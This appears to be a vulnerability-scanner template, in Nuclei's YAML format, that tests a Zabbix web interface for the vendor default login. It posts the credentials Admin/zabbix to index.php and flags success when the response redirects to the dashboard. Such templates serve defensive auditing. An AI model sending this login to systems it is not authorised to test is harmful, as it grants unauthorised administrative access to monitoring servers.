id: zabbix-default-credentials
info:
  name: Zabbix Default Credentials
  author: pdteam
  severity: critical
  tags: zabbix,default-login
requests:
  - method: POST
    path:
      - '{{BaseURL}}/index.php'
    headers:
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
    body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "zabbix.php?action=dashboard.view"
      - type: status
        status:
          - 302
